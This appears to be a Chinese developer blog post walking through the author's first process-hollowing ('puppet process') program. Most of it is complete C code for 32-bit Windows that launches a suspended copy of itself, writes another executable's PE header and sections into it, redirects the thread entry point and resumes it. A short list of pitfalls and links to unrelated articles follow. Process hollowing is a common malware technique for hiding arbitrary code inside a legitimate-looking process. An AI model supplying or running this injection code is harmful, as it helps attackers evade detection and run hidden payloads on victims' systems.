创建傀儡进程

2024-02-24 10:18
文章标签 创建 进程 傀儡

本文主要是介绍创建傀儡进程,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

折腾好久,总算完成了自己第一次的傀儡进程编写。
效果:使当前进程创建一个子进程(同名)
掏空 子进程,注入任何自己编写好的其他exe。

注意点
1.用来创建傀儡进程的父进程程序 需要是32位程序,因为编码的程序本身就是win32控制台程序
2.注入到进程中的程序32位,64位都行
3.pe结构取值时一定一定要留心是否需要加基址。
4.注意权限问题,以及CreateProcess API的pszCurDir参数问题。

代码

#include<stdio.h>
#include<windows.h>
#include<winbase.h>
struct _PROCESS_INFORMATION ProcessInfomation;int main()
{	LPVOID pAlloc1;LPVOID pAlloc2;HANDLE hfile;PIMAGE_NT_HEADERS pPeHeader;PIMAGE_SECTION_HEADER pSectionHeader;int lastError,ReadInfo=0;DWORD BytesRead=0;CONTEXT Context={0};Context.ContextFlags=CONTEXT_ALL;char lpName[260];/以挂起的方式创建傀儡进程,并获取进程基址STARTUPINFOA StartupInfo={0};PROCESS_INFORMATION ProcessInfomation = {0};StartupInfo.cb=sizeof(StartupInfo);GetModuleFileName(0,lpName,260);if(!CreateProcess(lpName,NULL,0,0,0,CREATE_SUSPENDED,0,0,&StartupInfo,&ProcessInfomation))//ProcessInfomation返回该进程主线程的信息 倒数第三个参数 运行环境:pszCurDir 一定要留心。{lastError=GetLastError();printf("CreateProcess fail  LastError:%d\n",lastError);};if(!GetThreadContext(ProcessInfomation.hThread,&Context)){lastError=GetLastError();printf("GetThreadContext fail LastError:%d\n",lastError);};if(!ReadProcessMemory(ProcessInfomation.hProcess,(LPCVOID)(Context.Ebx + 0x8),&ReadInfo,4,0)){lastError=GetLastError();printf("GetProcessImageBase fail LastError:%d\n",lastError);};printf("ProcessImageBase:address 0x%x\n",ReadInfo);// 把准备注入到傀儡进程的程序读进内存hfile=CreateFile("play.exe",GENERIC_READ,0,0,OPEN_EXISTING,0,0);pAlloc1=VirtualAlloc(NULL,0x70000,0x3000,4);ReadFile(hfile,pAlloc1,0x70000,&BytesRead,0);pPeHeader=(PIMAGE_NT_HEADERS)((PBYTE)pAlloc1+((PIMAGE_DOS_HEADER)pAlloc1)->e_lfanew);pSectionHeader=(IMAGE_SECTION_HEADER *)((char *)&pPeHeader->OptionalHeader + pPeHeader->FileHeader.SizeOfOptionalHeader);///向傀儡进程申请内存空间 SetLastError(0);pAlloc2=VirtualAllocEx(ProcessInfomation.hProcess,(LPVOID)pPeHeader->OptionalHeader.ImageBase,pPeHeader->OptionalHeader.SizeOfImage,0x3000,64);if(!pAlloc2){lastError=GetLastError();printf("VirtualAllocEx fail LastError:%d\n",lastError);TerminateProcess(ProcessInfomation.hProcess,0);return 0;}printf("AllocExBase: %x\n",pAlloc2);//写入PE头if(WriteProcessMemory(ProcessInfomation.hProcess,pAlloc2,pAlloc1,pPeHeader->OptionalHeader.SizeOfHeaders,0)){printf("write PeHeader Success !\n");}/写入节表,分节表写入会使得程序展开在进程中int NumofSection = pPeHeader->FileHeader.NumberOfSections;for(int i=0;i<NumofSection;i++){	LPVOID pAllocRawAddressSection=(char *)pAlloc1+pSectionHeader->PointerToRawData;LPVOID pAllocVirtualAddressSection=(char *)pPeHeader->OptionalHeader.ImageBase+pSectionHeader->VirtualAddress;if(WriteProcessMemory(ProcessInfomation.hProcess,pAllocVirtualAddressSection,pAllocRawAddressSection,pSectionHeader->SizeOfRawData,0)){printf("write the %d section success !\n",i+1);}else{lastError=GetLastError();printf("write the %d section fail ! lastError:%d\n",i+1,lastError);}pSectionHeader++;}///设置傀儡进程的进程基址0x400000if(WriteProcessMemory(ProcessInfomation.hProcess,(char *)Context.Ebx+8,&pPeHeader->OptionalHeader.ImageBase,4,0)){printf("set Process ImageBase is 0x400000  success !\n");}//设置傀儡进程的进程OEP 为注入程序的OEPContext.Eax=pPeHeader->OptionalHeader.ImageBase+pPeHeader->OptionalHeader.AddressOfEntryPoint;//设置入口点地址 一定别忘了加基址if(SetThreadContext(ProcessInfomation.hThread,&Context)){printf("set Thread Context success !\n");}//恢复线程运行if(ResumeThread(ProcessInfomation.hThread)!=(DWORD)-1){	lastError=GetLastError();printf("Resume Thread success ! \n");}system("pause");return 0;
}

编程中遇到的问题总结:

1.如果创建用来傀儡进程的程序,跟代码程序在不在同一目录时 ,CreateProcess()函数 一定要指定运行环境(pszCurDir)。
2.虽然指定了运行环境,但还是有各种各样的问题,这些问题可能都是写入程序自身的防御机制吧。但更多的可能是权限问题。

这篇关于创建傀儡进程的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/741783

相关文章

Python中使用uv创建环境及原理举例详解

Python中使用uv创建环境及原理举例详解

《Python中使用uv创建环境及原理举例详解》uv是Astral团队开发的高性能Python工具,整合包管理、虚拟环境、Python版本控制等功能,:本文主要介绍Python中使用uv创建环境及... 目录一、uv工具简介核心特点:二、安装uv1. 通过pip安装2. 通过脚本安装验证安装:配置镜像源(可
阅读更多...
Windows的CMD窗口如何查看并杀死nginx进程

Windows的CMD窗口如何查看并杀死nginx进程

《Windows的CMD窗口如何查看并杀死nginx进程》:本文主要介绍Windows的CMD窗口如何查看并杀死nginx进程问题,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地... 目录Windows的CMD窗口查看并杀死nginx进程开启nginx查看nginx进程停止nginx服务
阅读更多...
Java中实现线程的创建和启动的方法

Java中实现线程的创建和启动的方法

《Java中实现线程的创建和启动的方法》在Java中,实现线程的创建和启动是两个不同但紧密相关的概念,理解为什么要启动线程(调用start()方法)而非直接调用run()方法,是掌握多线程编程的关键,... 目录1. 线程的生命周期2. start() vs run() 的本质区别3. 为什么必须通过 st
阅读更多...
Java进程CPU使用率过高排查步骤详细讲解

Java进程CPU使用率过高排查步骤详细讲解

《Java进程CPU使用率过高排查步骤详细讲解》:本文主要介绍Java进程CPU使用率过高排查的相关资料,针对Java进程CPU使用率高的问题,我们可以遵循以下步骤进行排查和优化,文中通过代码介绍... 目录前言一、初步定位问题1.1 确认进程状态1.2 确定Java进程ID1.3 快速生成线程堆栈二、分析
阅读更多...
Macos创建python虚拟环境的详细步骤教学

Macos创建python虚拟环境的详细步骤教学

《Macos创建python虚拟环境的详细步骤教学》在macOS上创建Python虚拟环境主要通过Python内置的venv模块实现,也可使用第三方工具如virtualenv,下面小编来和大家简单聊聊... 目录一、使用 python 内置 venv 模块(推荐)二、使用 virtualenv(兼容旧版 P
阅读更多...
Linux lvm实例之如何创建一个专用于MySQL数据存储的LVM卷组

Linux lvm实例之如何创建一个专用于MySQL数据存储的LVM卷组

《Linuxlvm实例之如何创建一个专用于MySQL数据存储的LVM卷组》:本文主要介绍使用Linux创建一个专用于MySQL数据存储的LVM卷组的实例,具有很好的参考价值,希望对大家有所帮助,... 目录在Centos 7上创建卷China编程组并配置mysql数据目录1. 检查现有磁盘2. 创建物理卷3. 创
阅读更多...
Python多进程、多线程、协程典型示例解析(最新推荐)

Python多进程、多线程、协程典型示例解析(最新推荐)

《Python多进程、多线程、协程典型示例解析(最新推荐)》:本文主要介绍Python多进程、多线程、协程典型示例解析(最新推荐),本文通过实例代码给大家介绍的非常详细,对大家的学习或工作具有一定... 目录一、multiprocessing(多进程)1. 模块简介2. 案例详解:并行计算平方和3. 实现逻
阅读更多...
C#通过进程调用外部应用的实现示例

C#通过进程调用外部应用的实现示例

《C#通过进程调用外部应用的实现示例》本文主要介绍了C#通过进程调用外部应用的实现示例,以WINFORM应用程序为例,在C#应用程序中调用PYTHON程序,具有一定的参考价值,感兴趣的可以了解一下... 目录窗口程序类进程信息类 系统设置类 以WINFORM应用程序为例,在C#应用程序中调用python程序
阅读更多...
Java 如何创建和使用ExecutorService

Java 如何创建和使用ExecutorService

《Java如何创建和使用ExecutorService》ExecutorService是Java中用来管理和执行多线程任务的一种高级工具,可以有效地管理线程的生命周期和任务的执行过程,特别是在需要处... 目录一、什么是ExecutorService?二、ExecutorService的核心功能三、如何创建
阅读更多...
使用Python创建一个功能完整的Windows风格计算器程序

使用Python创建一个功能完整的Windows风格计算器程序

《使用Python创建一个功能完整的Windows风格计算器程序》:本文主要介绍如何使用Python和Tkinter创建一个功能完整的Windows风格计算器程序,包括基本运算、高级科学计算(如三... 目录python实现Windows系统计算器程序(含高级功能)1. 使用Tkinter实现基础计算器2.
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2